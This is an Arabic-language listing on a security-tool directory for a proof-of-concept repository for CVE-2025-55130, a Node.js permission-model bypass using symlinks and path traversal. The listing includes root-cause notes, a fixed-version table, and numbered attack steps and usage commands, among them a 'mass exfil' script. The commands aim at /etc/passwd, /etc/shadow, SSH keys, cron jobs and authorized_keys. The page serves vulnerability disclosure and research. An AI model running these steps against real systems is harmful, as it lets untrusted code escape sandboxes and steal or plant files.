Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55130 — POC لـ CVE-2025-55130 | Kitploit
أدوات/GitHubGitHub/scumfrog/cve-2025-55130
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالتسريب البياناتأمن الويبالهروب من الحاوية
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

POC لـ CVE-2025-55130

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55130 - تجاوز نموذج صلاحيات Node.js عبر الروابط الرمزية

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Node.js Permission Model Bypass via Crafted Symlinks
                   [ Discovered by natann @ JFrog ]

نظرة عامة

ثغرة في اجتياز المسار داخل Node.js تتيح تجاوز قيود الصلاحيات --allow-fs-read و--allow-fs-write باستخدام روابط رمزية (symlinks) تشير إلى مسارات مطلقة مقترنة باجتياز نسبي.

يتم تنفيذ فحص الصلاحيات وحلّ المسار بشكل منفصل. بمجرد اجتياز المسار الأولي لفحص الصلاحيات، يتم تتبّع الرابط الرمزي وتقوم تسلسلات الاجتياز بالهروب من بيئة العزل (sandbox).

الإصدارات المتأثرة

الفرع

التحليل التقني

السبب الجذري

root@kitploit:~
Permission Check:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
                   
Path Resolution:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   Resolves to /etc/passwd - OUTSIDE SANDBOX

يقوم نموذج الصلاحيات بالتحقق من سلسلة المسار قبل حلّ الرابط الرمزي. من خلال إنشاء رابط رمزي يشير إلى مسار مطلق واستخدام اجتياز ../ بعد الرابط الرمزي، يمكن الهروب من الدليل المسموح به.

خطوات الهجوم

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # Create nested dirs in allowed path
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink to absolute path  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         Permission check passes (inside ./)
         
   After symlink resolution:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   Traversal escapes to root

الملفات

الملفالغرض
exploit.jsالاستغلال الرئيسي - قراءة ملفات عشوائية
exploit_write.jsكتابة ملفات عشوائية

الاستخدام

root@kitploit:~
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Check if vulnerable
node check.js

# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

التأثير

  • قراءة ملفات حساسة: /etc/passwd و/etc/shadow ومفاتيح SSH وملفات الإعدادات
  • كتابة ملفات عشوائية: مهام cron وauthorized_keys وملفات الإعدادات
  • الهروب من الحاوية في البيئات متعددة المستأجرين
  • تجاوز بيئة العزل لتنفيذ تعليمات برمجية غير موثوقة

المراجع

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

الإشادات

  • اكتشاف الثغرة: Natan Nehorai (natann) @ JFrog Security Research
  • الإصلاح: RafaelGSS @ Node.js

لأغراض البحث والاختبار المصرح به فقط.

تنزيل الأداة
الإصدار المتأثر
الإصدار المُصلَّح
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
exfil.js
استخراج جماعي للملفات
check.jsالتحقق من قابلية الإصدار للإصابة بالثغرة